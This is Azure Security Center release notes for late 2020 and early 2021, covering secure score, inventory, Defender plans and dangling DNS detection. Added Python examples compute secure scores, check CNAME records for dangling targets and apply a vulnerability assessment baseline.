[Screenshot: reference guide entry. Management ports should be closed on your virtual machines - Open remote management ports are exposing your VM to a high level of risk from Internet-based attacks. These attacks attempt to brute force credentials to gain admin access to the machine. Severity: Medium. (Related policy: Management ports should be closed on your virtual machines)]


SQL data classification recommendation no longer affects your 
secure score 


The recommendation Sensitive data in your SQL databases should be classified no longer affects your 
secure score. This is the only recommendation in the Apply data classification security control, so that 
control now has a secure score value of 0. 


For a full list of all security controls in Security Center, together with their scores and a list of the recommendations in each, see Security controls and their recommendations.


Workflow automations can be triggered by changes to regulatory 
compliance assessments (in preview) 


We've added a third data type to the trigger options for your workflow automations: changes to 
regulatory compliance assessments. 


Learn how to use the workflow automation tools in Automate responses to Security Center triggers. 


[Screenshot: Settings | Workflow automation > Add workflow automation. The trigger conditions use the "Regulatory compliance standards" data type, with compliance standard Azure-Security-Benchmark and compliance control state Passed, Failed (available states: Failed, Passed, Skipped, Unsupported).]


Asset inventory page enhancements 
Security Center's asset inventory page has been improved in the following ways: 


- Summaries at the top of the page now include Unregistered subscriptions, showing the number of subscriptions without Security Center enabled.

[Screenshot: inventory page summary tiles: Total Resources, Unhealthy Resources, Unmonitored Resources, Unregistered subscriptions]

- Filters have been expanded and enhanced to include:

  - Counts - Each filter presents the number of resources that meet the criteria of each category

  [Screenshot: Resource types filter with a resource count next to each type, for example storage account (555), subnet (309), public ip addresses (239)]

  - Contains exemptions filter (Optional) - narrow the results to resources that have/haven't got exemptions. This filter isn't shown by default, but is accessible from the Add filter button.

  [Screenshot: inventory page toolbar and filter bar with the Add filter button]


Learn more about how to Explore and manage your resources with asset inventory. 


January 2021 
Updates in January include: 


- Azure Security Benchmark is now the default policy initiative for Azure Security Center
- Vulnerability assessment for on-premises and multicloud machines is released for general availability (GA)
- Secure score for management groups is now available in preview
- Secure score API is released for general availability (GA)
- Dangling DNS protections added to Azure Defender for App Service
- Multicloud connectors are released for general availability (GA)
- Exempt entire recommendations from your secure score for subscriptions and management groups
- Users can now request tenant-wide visibility from their global administrator
- 35 preview recommendations added to increase coverage of Azure Security Benchmark
- CSV export of filtered list of recommendations
- "Not applicable" resources now reported as "Compliant" in Azure Policy assessments
- Export weekly snapshots of secure score and regulatory compliance data with continuous export (preview)


Azure Security Benchmark is now the default policy initiative for Azure Security Center


Azure Security Benchmark is the Microsoft-authored, Azure-specific set of guidelines for security and compliance best practices based on common compliance frameworks. This widely respected benchmark builds on the controls from the Center for Internet Security (CIS) and the National Institute of Standards and Technology (NIST) with a focus on cloud-centric security.


In recent months, Security Center's list of built-in security recommendations has grown significantly to 
expand our coverage of this benchmark. 


From this release, the benchmark is the foundation for Security Center's recommendations and fully 
integrated as the default policy initiative. 


All Azure services have a security baseline page in their documentation. These baselines are built on 
Azure Security Benchmark. 


If you're using Security Center's regulatory compliance dashboard, you'll see two instances of the 
benchmark during a transition period: 


[Screenshot: Regulatory compliance dashboard for subscription "Dev1 Test 1" showing the standards Azure Security Benchmark, ISO 27001, PCI DSS 3.2.1, SOC TSP and Azure Security Benchmark (Deprecated). The dashboard notes that under each compliance control is the set of assessments associated with that control; all assessments passing does not ensure full compliance with that control, and not all controls of a regulation are covered, so the report is only a partial view of overall compliance status.]


Existing recommendations are unaffected and as the benchmark grows, changes will automatically be reflected within Security Center.

To learn more, see the following pages:

- Learn more about Azure Security Benchmark
- Customize the set of standards in your regulatory compliance dashboard


Vulnerability assessment for on-premises and multicloud machines is released for general availability (GA)


In October, we announced a preview for scanning Azure Arc-enabled servers with Azure Defender for 
Servers' integrated vulnerability assessment scanner (powered by Qualys). 


It's now released for general availability (GA). 


When you've enabled Azure Arc on your non-Azure machines, Security Center will offer to deploy the 
integrated vulnerability scanner on them - manually and at-scale. 


With this update, you can unleash the power of Azure Defender for Servers to consolidate your 
vulnerability management program across all of your Azure and non-Azure assets. 


Main capabilities: 


- Monitoring the VA (vulnerability assessment) scanner provisioning state on Azure Arc machines
- Provisioning the integrated VA agent to unprotected Windows and Linux Azure Arc machines (manually and at-scale)
- Receiving and analyzing detected vulnerabilities from deployed agents (manually and at-scale)
- Unified experience for Azure VMs and Azure Arc machines


Learn more about deploying the integrated Qualys vulnerability scanner to your hybrid machines. 


Learn more about Azure Arc-enabled servers. 


Secure score for management groups is now available in preview 


The secure score page now shows the aggregated secure scores for your management groups in addition to the subscription level. So now you can see the list of management groups in your organization and the score for each management group.


[Screenshot: Secure Score page listing management groups (for example Contoso, IT, App Team, Infra Team) with the secure score, unhealthy resources and total resources of each, and the subscriptions under them with their own scores]


Learn more about secure score and security controls in Azure Security Center. 


Secure score API is released for general availability (GA) 


You can now access your score via the secure score API. The API methods provide the flexibility to 
query the data and build your own reporting mechanism of your secure scores over time. For example: 


- use the Secure Scores API to get the score for a specific subscription
- use the Secure Score Controls API to list the security controls and the current score of your subscriptions
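Both the management-group view above and the API build on the same per-control arithmetic. The following is an added example, not Microsoft's code: it reads a Secure Score Controls API response, computes the secure score percentage of a subscription from the documented formula (a control's current score is its max score times the share of healthy resources, and the secure score is the sum of current scores over the sum of max scores), and aggregates several subscriptions into one score. The responses are constructed to resemble the shape of the API result, the control names are placeholders, and treating a multi-subscription score as the score of the combined resource population is an assumption of this example.

```python
"""Added example, not Microsoft's code: compute a secure score from a Secure Score
Controls API response and aggregate it across subscriptions. The responses are
constructed to resemble the shape of the API result."""

from typing import Dict, List, Tuple

API_VERSION = "2020-01-01"


def secure_score_controls_url(subscription_id: str) -> str:
    """URL of the Secure Score Controls API for one subscription (called with a GET
    and an Azure Resource Manager bearer token; the HTTP call is not made here)."""
    return (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Security/secureScores/ascScore/secureScoreControls"
        f"?api-version={API_VERSION}"
    )


def control_points(max_score: float, healthy: int, unhealthy: int) -> Tuple[float, float]:
    """Documented secure score formula: current = max * healthy / (healthy + unhealthy).
    A control with no applicable resources contributes nothing to either total."""
    total = healthy + unhealthy
    if total == 0:
        return 0.0, 0.0
    return max_score * healthy / total, float(max_score)


def score_percentage(controls: List[dict]) -> float:
    """Secure score, as a percentage, for a list of control objects."""
    current_sum = max_sum = 0.0
    for control in controls:
        props = control["properties"]
        current, max_score = control_points(
            props["score"]["max"],
            props["healthyResourceCount"],
            props["unhealthyResourceCount"],
        )
        current_sum += current
        max_sum += max_score
    return round(100 * current_sum / max_sum, 1) if max_sum else 0.0


def _control(name: str, display_name: str, max_score: float, healthy: int, unhealthy: int) -> dict:
    """Build one control object in the shape the API returns (constructed)."""
    return {
        "name": name,
        "type": "Microsoft.Security/secureScores/secureScoreControls",
        "properties": {
            "displayName": display_name,
            "score": {"max": max_score},
            "healthyResourceCount": healthy,
            "unhealthyResourceCount": unhealthy,
        },
    }


def aggregate_controls(responses: List[dict]) -> List[dict]:
    """Merge per-subscription control lists by control name, summing resource counts.
    Assumption of this example: a score over several subscriptions is the score of
    the combined resource population, not the average of per-subscription scores."""
    merged: Dict[str, dict] = {}
    for response in responses:
        for control in response["value"]:
            props = control["properties"]
            entry = merged.setdefault(
                control["name"],
                _control(control["name"], props["displayName"], props["score"]["max"], 0, 0),
            )
            entry["properties"]["healthyResourceCount"] += props["healthyResourceCount"]
            entry["properties"]["unhealthyResourceCount"] += props["unhealthyResourceCount"]
    return list(merged.values())


# Constructed responses for two subscriptions; control names are placeholders.
SUB_A = {"value": [_control("ctrl-mfa", "Enable MFA", 10, 1, 1),
                   _control("ctrl-ports", "Secure management ports", 8, 3, 1)]}
SUB_B = {"value": [_control("ctrl-mfa", "Enable MFA", 10, 1, 3),
                   _control("ctrl-ports", "Secure management ports", 8, 0, 4),
                   _control("ctrl-updates", "Apply system updates", 6, 0, 0)]}

if __name__ == "__main__":
    print("subscription A:", score_percentage(SUB_A["value"]), "%")
    print("subscription B:", score_percentage(SUB_B["value"]), "%")
    print("management group:", score_percentage(aggregate_controls([SUB_A, SUB_B])), "%")
```

Note that the combined score (35.2%) is not the average of the two subscription scores (61.1% and 13.9%): the control with no applicable resources drops out of the denominator, and a subscription with more resources weighs more. Polling the API on a schedule and storing each percentage is the simplest way to build the over-time reporting the announcement mentions.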


Learn about external tools made possible with the secure score API in the secure score area of our GitHub community.


Learn more about secure score and security controls in Azure Security Center. 


Dangling DNS protections added to Azure Defender for App Service


Subdomain takeovers are a common, high-severity threat for organizations. A subdomain takeover can 
occur when you have a DNS record that points to a deprovisioned web site. Such DNS records are also 
known as “dangling DNS" entries. CNAME records are especially vulnerable to this threat. 


Subdomain takeovers enable threat actors to redirect traffic intended for an organization's domain to a 
site performing malicious activity. 


Azure Defender for App Service now detects dangling DNS entries when an App Service website is decommissioned. This is the moment at which the DNS entry is pointing at a non-existent resource, and your website is vulnerable to a subdomain takeover. These protections are available whether your domains are managed with Azure DNS or an external domain registrar and apply to both App Service on Windows and App Service on Linux.
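The detection reacts to the decommissioning event; a complementary, zone-side check is to walk your own CNAME records and confirm that every target still resolves. The following is an added example, not Microsoft's detection logic: DNS lookups go through an injectable resolver so that it runs offline against constructed zone data, and a `system_resolver` using the OS resolver is included for real use. The zone records, addresses and the `SERVICE_SUFFIXES` table are constructed for the example.

```python
"""Added example, not Microsoft's detection logic: a dangling-DNS check for your
own zone. For every CNAME record it resolves the target; a target that no longer
resolves is the dangling condition that allows a subdomain takeover, so the
record should be removed (or the resource re-created under the same name) as
part of decommissioning. Lookups go through an injectable resolver so the check
runs offline against constructed data; system_resolver() queries real DNS."""

import socket
from typing import Callable, Dict, List, Optional

# hostname -> an address, or None when the name does not resolve
Resolver = Callable[[str], Optional[str]]

# Azure hostname suffixes used to label the service behind a CNAME target
# (constructed subset for this example).
SERVICE_SUFFIXES = {
    ".azurewebsites.net": "App Service",
    ".cloudapp.azure.com": "Cloud Service / classic VM",
    ".trafficmanager.net": "Traffic Manager",
}


def system_resolver(hostname: str) -> Optional[str]:
    """Resolve with the OS resolver; None on NXDOMAIN or any lookup failure
    (a simplification: a transient failure is reported like a missing name, so
    confirm a finding with a second lookup before acting on it)."""
    try:
        return socket.gethostbyname(hostname)
    except socket.gaierror:
        return None


def classify_target(target: str) -> str:
    """Label the Azure service a CNAME target points at, or "other"."""
    for suffix, service in SERVICE_SUFFIXES.items():
        if target.endswith(suffix):
            return service
    return "other"


def find_dangling(cnames: Dict[str, str], resolve: Resolver) -> List[dict]:
    """Return one finding per CNAME record whose target does not resolve."""
    findings = []
    for owner, target in cnames.items():
        target = target.rstrip(".").lower()  # zone files carry a trailing dot
        if resolve(target) is None:
            findings.append({"record": owner, "target": target,
                             "service": classify_target(target)})
    return findings


# Constructed sample zone data: owner name -> CNAME target.
SAMPLE_CNAMES = {
    "www.contoso.example": "contoso-www.azurewebsites.net.",
    "shop.contoso.example": "contoso-shop.azurewebsites.net.",  # site was decommissioned
    "cdn.contoso.example": "contoso.azureedge.net",
}
# Constructed DNS answers standing in for the real resolver: the shop target is gone.
_SAMPLE_ANSWERS = {
    "contoso-www.azurewebsites.net": "203.0.113.10",
    "contoso.azureedge.net": "203.0.113.20",
}


def sample_resolver(hostname: str) -> Optional[str]:
    return _SAMPLE_ANSWERS.get(hostname)


if __name__ == "__main__":
    for f in find_dangling(SAMPLE_CNAMES, sample_resolver):
        print(f"{f['record']} -> {f['target']} ({f['service']}) no longer resolves; "
              "remove the record")
```

Run with `find_dangling(zone, system_resolver)` against the records exported from your DNS provider. The fix for a finding is on the DNS side: delete or repoint the CNAME, and in future remove the record before the App Service site is deleted so no window exists in which the name dangles.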


Learn more: 


- App Service alert reference table - Includes two new Azure Defender alerts that trigger when a dangling DNS entry is detected
- Prevent dangling DNS entries and avoid subdomain takeover - Learn about the threat of subdomain takeover and the dangling DNS aspect
- Introduction to Azure Defender for App Service


Multicloud connectors are released for general availability (GA) 


With cloud workloads commonly spanning multiple cloud platforms, cloud security services must do 
the same. 


Azure Security Center protects workloads in Azure, Amazon Web Services (AWS), and Google Cloud 
Platform (GCP). 


Connecting your AWS or GCP projects integrates their native security tools like AWS Security Hub and 
GCP Security Command Center into Azure Security Center. 


This capability means that Security Center provides visibility and protection across all major cloud 
environments. Some of the benefits of this integration: 


- Automatic agent provisioning - Security Center uses Azure Arc to deploy the Log Analytics agent to your AWS instances
- Policy management
- Vulnerability management
- Embedded Endpoint Detection and Response (EDR)
- Detection of security misconfigurations
- A single view showing security recommendations from all cloud providers
- Incorporate all of your resources into Security Center's secure score calculations
- Regulatory compliance assessments of your AWS and GCP resources


From Defender for Cloud's menu, select Multicloud connectors and you'll see the options for creating 
new connectors: 


[Screenshot: Multicloud connectors page with "Add AWS account" and "Add GCP account" buttons and a connector list with the columns Display name, Environment, Account / Org ID, Subscription, Status]


Learn more in: 


- Connect your AWS accounts to Azure Security Center
- Connect your GCP projects to Azure Security Center


Exempt entire recommendations from your secure score for subscriptions and management groups


We're expanding the exemption capability to include entire recommendations. This provides further options to fine-tune the security recommendations that Security Center makes for your subscriptions, management group, or resources.

Occasionally, a resource will be listed as unhealthy when you know the issue has been resolved by a third-party tool which Security Center hasn't detected. Or a recommendation will show in a scope where you feel it doesn't belong. The recommendation might be inappropriate for a specific subscription. Or perhaps your organization has decided to accept the risks related to the specific resource or recommendation.

With this preview feature, you can now create an exemption for a recommendation to:


- Exempt a resource to ensure it isn't listed with the unhealthy resources in the future, and doesn't impact your secure score. The resource will be listed as not applicable and the reason will be shown as "exempted" with the specific justification you select.
- Exempt a subscription or management group to ensure that the recommendation doesn't impact your secure score and won't be shown for the subscription or management group in the future. This relates to existing resources and any you create in the future. The recommendation will be marked with the specific justification you select for the scope that you selected.


Learn more in Exempting resources and recommendations from your secure score. 


Users can now request tenant-wide visibility from their global administrator


If a user doesn't have permissions to see Security Center data, they'll now see a link to request permissions from their organization's global administrator. The request includes the role they'd like and the justification for why it's necessary.


[Screenshot: Overview page with "No subscriptions are selected" shown for Secure score, Regulatory compliance, Microsoft Defender for Cloud and Inventory, and counts of 0 for Azure subscriptions, AWS accounts, GCP projects, active recommendations and security alerts]


Learn more in Request tenant-wide permissions when yours are insufficient. 


35 preview recommendations added to increase coverage of Azure Security Benchmark


Azure Security Benchmark is the default policy initiative in Azure Security Center. 


To increase the coverage of this benchmark, the following 35 preview recommendations have been added to Security Center.


Tip

Preview recommendations don't render a resource unhealthy, and they aren't included in the calculations of your secure score. Remediate them wherever possible, so that when the preview period ends they'll contribute towards your score. Learn more about how to respond to these recommendations in Remediate recommendations in Azure Security Center.


Security control: Enable encryption at rest
New recommendations:
- Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest
- Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)
- Bring your own key data protection should be enabled for MySQL servers
- Bring your own key data protection should be enabled for PostgreSQL servers
- Azure AI services accounts should enable data encryption with a customer-managed key (CMK)
- Container registries should be encrypted with a customer-managed key (CMK)
- SQL managed instances should use customer-managed keys to encrypt data at rest
- SQL servers should use customer-managed keys to encrypt data at rest
- Storage accounts should use customer-managed key (CMK) for encryption

Security control: Implement security best practices
New recommendations:
- Subscriptions should have a contact email address for security issues
- Auto provisioning of the Log Analytics agent should be enabled on your subscription
- Email notification for high severity alerts should be enabled
- Email notification to subscription owner for high severity alerts should be enabled
- Key vaults should have purge protection enabled
- Key vaults should have soft delete enabled

Security control: Manage access and permissions
New recommendations:
- Function apps should have 'Client Certificates (Incoming client certificates)' enabled

Security control: Protect applications against DDoS attacks
New recommendations:
- Web Application Firewall (WAF) should be enabled for Application Gateway
- Web Application Firewall (WAF) should be enabled for Azure Front Door Service service

Security control: Restrict unauthorized network access
New recommendations:
- Firewall should be enabled on Key Vault
- Private endpoint should be configured for Key Vault
- App Configuration should use private link
- Azure Cache for Redis should reside within a virtual network
- Azure Event Grid domains should use private link
- Azure Event Grid topics should use private link
- Azure Machine Learning workspaces should use private link
- Azure SignalR Service should use private link
- Azure Spring Cloud should use network injection
- Container registries should not allow unrestricted network access
- Container registries should use private link
- Public network access should be disabled for MariaDB servers
- Public network access should be disabled for MySQL servers
- Public network access should be disabled for PostgreSQL servers
- Storage account should use a private link connection
- Storage accounts should restrict network access using virtual network rules
- VM Image Builder templates should use private link

Related links:

- Learn more about Azure Security Benchmark
- Learn more about Azure Database for MariaDB
- Learn more about Azure Database for MySQL
- Learn more about Azure Database for PostgreSQL


CSV export of filtered list of recommendations 


In November 2020, we added filters to the recommendations page (Recommendations list now includes filters). In December, we expanded those filters (Recommendations page has new filters for environment, severity, and available responses).


With this announcement, we're changing the behavior of the Download to CSV button so that the CSV 
export only includes the recommendations currently displayed in the filtered list. 


For example, in the image below you can see that the list has been filtered to two recommendations. The CSV file that is generated includes the status details for every resource affected by those two recommendations.


[Screenshot: Recommendations page filtered to control status Completed, showing the Enable MFA control with its two recommendations "MFA should be enabled on accounts with owner permissions on your subscription" and "MFA should be enabled on accounts with write permissions on your subscription", and the Download CSV report button]

Learn more in Security recommendations in Azure Security Center.


"Not applicable" resources now reported as "Compliant" in Azure Policy assessments


Previously, resources that were evaluated for a recommendation and found to be not applicable 
appeared in Azure Policy as "Non-compliant". No user actions could change their state to "Compliant". 


With this change, they're reported as "Compliant" for improved clarity. 


The only impact will be seen in Azure Policy where the number of compliant resources will increase. 


There will be no impact to your secure score in Azure Security Center. 


Export weekly snapshots of secure score and regulatory compliance data with continuous export (preview)


We've added a new preview feature to the continuous export tools for exporting weekly snapshots of secure score and regulatory compliance data.


When you define a continuous export, set the export frequency: 


[Screenshot: Export frequency options: "Streaming updates" (export updates in real-time) and "Snapshots (Preview)" (export weekly snapshot of the data types selected under 'Exported data types'; the supported data types are overall Secure score, secure score controls, regulatory compliance)]

- Streaming - assessments will be sent when a resource's health state is updated (if no updates occur, no data will be sent).
- Snapshots - a snapshot of the current state of all regulatory compliance assessments will be sent every week (this is a preview feature for weekly snapshots of secure scores and regulatory compliance data).


Learn more about the full capabilities of this feature in Continuously export Security Center data. 


December 2020 


Updates in December include: 


- Azure Defender for SQL servers on machines is generally available
- Azure Defender for SQL support for Azure Synapse Analytics dedicated SQL pool is generally available
- Global Administrators can now grant themselves tenant-level permissions
- Two new Azure Defender plans: Azure Defender for DNS and Azure Defender for Resource Manager (in preview)
- New security alerts page in the Azure portal (preview)
- Revitalized Security Center experience in Azure SQL Database & SQL Managed Instance
- Asset inventory tools and filters updated
- Recommendation about web apps requesting SSL certificates no longer part of secure score
- Recommendations page has new filters for environment, severity, and available responses
- Continuous export gets new data types and improved deployifnotexist policies


Azure Defender for SQL servers on machines is generally available


Azure Security Center offers two Azure Defender plans for SQL Servers: 


- Azure Defender for Azure SQL database servers - defends your Azure-native SQL Servers
- Azure Defender for SQL servers on machines - extends the same protections to your SQL servers in hybrid, multicloud, and on-premises environments


With this announcement, Azure Defender for SQL now protects your databases and their data 
wherever they're located. 


Azure Defender for SQL includes vulnerability assessment capabilities. The vulnerability assessment 
tool includes the following advanced features: 


- Baseline configuration (New!) to intelligently refine the results of vulnerability scans to those that might represent real security issues. After you've established your baseline security state, the vulnerability assessment tool only reports deviations from that baseline state. Results that match the baseline are considered as passing subsequent scans. This lets you and your analysts focus your attention where it matters.
- Detailed benchmark information to help you understand the discovered findings, and why they relate to your resources.
- Remediation scripts to help you mitigate identified risks.
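The baseline behaviour described in the first bullet is easy to get wrong when reproducing scan results in your own tooling, so here is an added example (not the Azure Defender for SQL implementation) of how a baseline narrows results to deviations. Each finding carries the rows its check reported (for example the principals in a database role); rows the baseline accepts are treated as expected, so a rule whose rows are all baselined passes and only newly appearing rows are reported. The rule IDs are the ones visible on this page (VA2108, VA1288, VA2130, VA2109); the row contents and the baseline are constructed.

```python
"""Added example, not the Azure Defender for SQL implementation: apply a baseline
to vulnerability assessment scan results so that only deviations are reported.
Rule IDs are the ones shown on this page; the rows and baseline are constructed."""

from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

Row = Tuple[str, ...]  # one result row of a check, e.g. (role, principal)


@dataclass(frozen=True)
class Finding:
    rule_id: str
    title: str
    status: str             # "Finding" or "Pass" as produced by the scan
    rows: Tuple[Row, ...]   # result rows the check reported


def apply_baseline(scan: List[Finding], baseline: Dict[str, Set[Row]]) -> List[dict]:
    """Re-evaluate scan results against a baseline of accepted rows per rule.

    - a rule the scan already passes stays "Pass";
    - a rule with findings whose rows are all in the baseline becomes "Pass (baseline)";
    - any row not in the baseline is a deviation and the rule stays "Finding",
      reporting only the new rows."""
    report = []
    for finding in scan:
        accepted = baseline.get(finding.rule_id, set())
        new_rows = tuple(row for row in finding.rows if row not in accepted)
        if finding.status != "Finding":
            status = "Pass"
        elif new_rows:
            status = "Finding"
        else:
            status = "Pass (baseline)"
        report.append({"rule_id": finding.rule_id, "title": finding.title,
                       "status": status, "rows": new_rows})
    return report


def deviations(report: List[dict]) -> List[str]:
    """Rule IDs that still need attention after the baseline is applied."""
    return [entry["rule_id"] for entry in report if entry["status"] == "Finding"]


# Constructed scan results for one database.
SAMPLE_SCAN = [
    Finding("VA2108", "Minimal set of principals should be members of fixed high impact database roles",
            "Finding", (("db_owner", "app_admin"), ("db_owner", "svc_backup"))),
    Finding("VA1288", "Sensitive data columns should be classified",
            "Finding", (("dbo.Customers", "Email"),)),
    Finding("VA2130", "Track all users with access to the database",
            "Finding", (("reporting_reader",),)),
    Finding("VA2109", "Minimal set of principals should be members of fixed low impact database roles",
            "Pass", ()),
]
# Constructed baseline: app_admin in db_owner is approved; reporting_reader is a known user.
SAMPLE_BASELINE: Dict[str, Set[Row]] = {
    "VA2108": {("db_owner", "app_admin")},
    "VA2130": {("reporting_reader",)},
}

if __name__ == "__main__":
    for entry in apply_baseline(SAMPLE_SCAN, SAMPLE_BASELINE):
        print(entry["rule_id"], entry["status"], entry["rows"])
```

With the sample data only VA2108 (because `svc_backup` was added to `db_owner` after the baseline was set) and VA1288 (no baseline at all) remain findings; VA2130 passes on the strength of the baseline. A baseline should record who approved each accepted row and be reviewed when the approval lapses, otherwise the "pass" silently ages into an unreviewed exception.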


Learn more about Azure Defender for SQL. 


Azure Defender for SQL support for Azure Synapse Analytics dedicated SQL pool is generally available


Azure Synapse Analytics (formerly SQL DW) is an analytics service that combines enterprise data 
warehousing and big data analytics. Dedicated SQL pools are the enterprise data warehousing features 
of Azure Synapse. Learn more in What is Azure Synapse Analytics (formerly SQL DW)?. 


Azure Defender for SQL protects your dedicated SQL pools with: 


- Advanced threat protection to detect threats and attacks
- Vulnerability assessment capabilities to identify and remediate security misconfigurations


Azure Defender for SQL's support for Azure Synapse Analytics SQL pools is automatically added to the Azure SQL databases bundle in Azure Security Center. You'll find a new "Azure Defender for SQL" tab in your Synapse workspace page in the Azure portal.


Learn more about Azure Defender for SQL. 


Global Administrators can now grant themselves tenant-level permissions


A user with the Azure Active Directory role of Global Administrator might have tenant-wide 
responsibilities, but lack the Azure permissions to view that organization-wide information in Azure 
Security Center. 


To assign yourself tenant-level permissions, follow the instructions in Grant tenant-wide permissions to 
yourself. 


Two new Azure Defender plans: Azure Defender for DNS and Azure Defender for Resource Manager (in preview)


We've added two new cloud-native breadth threat protection capabilities for your Azure environment.

These new protections greatly enhance your resiliency against attacks from threat actors, and significantly increase the number of Azure resources protected by Azure Defender.


- Azure Defender for Resource Manager - automatically monitors all resource management operations performed in your organization. For more information, see:
  - Introduction to Azure Defender for Resource Manager
  - Respond to Azure Defender for Resource Manager alerts
  - List of alerts provided by Azure Defender for Resource Manager

- Azure Defender for DNS - continuously monitors all DNS queries from your Azure resources. For more information, see:
  - Introduction to Azure Defender for DNS
  - Respond to Azure Defender for DNS alerts
  - List of alerts provided by Azure Defender for DNS


New security alerts page in the Azure portal (preview) 
Azure Security Center's security alerts page has been redesigned to provide: 


- Improved triage experience for alerts - to help reduce alert fatigue and make it easier to focus on the most relevant threats, the list includes customizable filters and grouping options
- More information in the alerts list - such as MITRE ATT&CK tactics
- Button to create sample alerts - to evaluate Azure Defender capabilities and test your alerts configuration (for SIEM integration, email notifications, and workflow automations), you can create sample alerts from all Azure Defender plans
- Alignment with Azure Sentinel's incident experience - for customers who use both products, switching between them is now a more straightforward experience and it's easy to learn one from the other
- Better performance for large alerts lists
- Keyboard navigation through the alert list
- Alerts from Azure Resource Graph - you can query alerts in Azure Resource Graph, the Kusto-like API for all of your resources. This is also useful if you're building your own alerts dashboards. Learn more about Azure Resource Graph.


To access the new experience, use the ‘try it now’ link from the banner at the top of the security alerts 
page. 


[Screenshot: Security alerts page with the banner "PREVIEW AVAILABLE: New security alerts page in Azure Security Center. Try it now >"]


To create sample alerts from the new alerts experience, see Generate sample Azure Defender alerts.


Revitalized Security Center experience in Azure SQL Database & SQL Managed Instance


The Security Center experience within SQL provides access to the following Security Center and Azure 
Defender for SQL features: 


- Security recommendations - Security Center periodically analyzes the security state of all connected Azure resources to identify potential security misconfigurations. It then provides recommendations on how to remediate those vulnerabilities and improve organizations' security posture.
- Security alerts - a detection service that continuously monitors Azure SQL activities for threats such as SQL injection, brute-force attacks, and privilege abuse. This service triggers detailed and action-oriented security alerts in Security Center and provides options for continuing investigations with Azure Sentinel, Microsoft's Azure-native SIEM solution.
- Findings - a vulnerability assessment service that continuously monitors Azure SQL configurations and helps remediate vulnerabilities. Assessment scans provide an overview of Azure SQL security states together with detailed security findings.


[Screenshot: the Microsoft Defender for Cloud page of the SQL database samplecrmcwusdemo, showing its recommendations ("Sensitive data in your SQL databases should be classified", High; "Transparent Data Encryption on SQL databases should be enabled", Low), security incidents and alerts from the past 21 days, and vulnerability assessment findings VA2108 "Minimal set of principals should be members of fixed high impact database roles" (High), VA1288 "Sensitive data columns should be classified" (Medium), VA2130 "Track all users with access to the database" (Low) and VA2109 "Minimal set of principals should be members of fixed low impact database roles" (Low)]


Asset inventory tools and filters updated

The inventory page in Azure Security Center has been refreshed with the following changes:

- Guides and feedback added to the toolbar. This opens a pane with links to related information and tools.

- Subscriptions filter added to the default filters available for your resources.

- Open query link for opening the current filter options as an Azure Resource Graph query (formerly called "View in resource graph explorer").

- Operator options for each filter. Now you can choose from more logical operators other than '='. For example, you might want to find all resources with active recommendations whose titles include the string 'encrypt'.


[Screenshot: the inventory filter pane with the Recommendations filter's operator set to "contains".]


Learn more about inventory in Explore and manage your resources with asset inventory. 


Recommendation about web apps requesting SSL certificates no 
longer part of secure score 


The recommendation "Web apps should request an SSL certificate for all incoming requests" has been 
moved from the security control Manage access and permissions (worth a maximum of 4 pts) into 
Implement security best practices (which is worth no points). 


Ensuring a web app requests a certificate certainly makes it more secure. However, for public-facing 
web apps it's irrelevant. If you access your site over HTTP and not HTTPS, you will not receive any client 
certificate. So if your application requires client certificates, you should not allow requests to your 
application over HTTP. Learn more in Configure TLS mutual authentication for Azure App Service. 


With this change, the recommendation is now a recommended best practice that does not impact your score.

Learn which recommendations are in each security control in Security controls and their recommendations.


Recommendations page has new filters for environment, severity, 
and available responses 


Azure Security Center monitors all connected resources and generates security recommendations. Use 
these recommendations to strengthen your hybrid cloud posture and track compliance with the 
policies and standards relevant to your organization, industry, and country/region. 


As Security Center continues to expand its coverage and features, the list of security recommendations 
is growing every month. For example, see 29 preview recommendations added to increase coverage of 
Azure Security Benchmark. 


With the growing list, there's a need to filter the recommendations to find the ones of greatest interest. In November, we added filters to the recommendations page (see Recommendations list now includes filters).

The filters added this month provide options to refine the recommendations list according to:

- Environment - View recommendations for your AWS, GCP, or Azure resources (or any combination)

- Severity - View recommendations according to the severity classification set by Security Center

- Response actions - View recommendations according to the availability of Security Center response options: Fix, Deny, and Enforce

Tip
The response actions filter replaces the Quick fix available (Yes/No) filter.

Learn more about each of these response options:
  o Fix button
  o Prevent misconfigurations with Enforce/Deny recommendations


[Screenshot: the Recommendations page for 59 subscriptions, grouped by security control with the potential score increase and unhealthy resource counts, for example Remediate vulnerabilities (+9%, 6 points, 216 of 255 resources), Enable encryption at rest (+5%, 3 points, 213 of 298 resources), Remediate security configurations (+5%, 3 points, 180 of 265 resources) and Apply system updates (+3%, 2 points, 115 of 362 resources).]


Continuous export gets new data types and improved 
deployifnotexist policies 


Azure Security Center's continuous export tools enable you to export Security Center's recommendations and alerts for use with other monitoring tools in your environment.

Continuous export lets you fully customize what will be exported, and where it will go. For full details, see Continuously export Security Center data.

These tools have been enhanced and expanded in the following ways:

- Continuous export's deployifnotexist policies enhanced. The policies now:

  o Check whether the configuration is enabled. If it isn't, the policy will show as non-compliant and create a compliant resource. Learn more about the supplied Azure Policy templates in the "Deploy at scale with Azure Policy" tab in Set up a continuous export.

  o Support exporting security findings. When using the Azure Policy templates, you can configure your continuous export to include findings. This is relevant when exporting recommendations that have 'sub' recommendations, like findings from vulnerability assessment scanners or specific system updates for the 'parent' recommendation "System updates should be installed on your machines".

  o Support exporting secure score data.

- Regulatory compliance assessment data added (in preview). You can now continuously export updates to regulatory compliance assessments, including for any custom initiatives, to a Log Analytics workspace or Event Hubs. This feature is unavailable on national clouds.

[Screenshot: the Continuous export page, whose description reads "Configure streaming export setting of Microsoft Defender for Cloud data to multiple export targets. Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer."]

November 2020

Updates in November include:

- 29 preview recommendations added to increase coverage of Azure Security Benchmark

- NIST SP 800 171 R2 added to Security Center's regulatory compliance dashboard

- Recommendations list now includes filters

- Auto provisioning experience improved and expanded

- Secure score is now available in continuous export (preview)

- "System updates should be installed on your machines" recommendation now includes subrecommendations

- Policy management page in the Azure portal now shows status of default policy assignments


29 preview recommendations added to increase coverage of Azure Security Benchmark

Azure Security Benchmark is the Microsoft-authored, Azure-specific set of guidelines for security and compliance best practices based on common compliance frameworks. Learn more about Azure Security Benchmark.

The following 29 preview recommendations have been added to Security Center to increase the coverage of this benchmark.

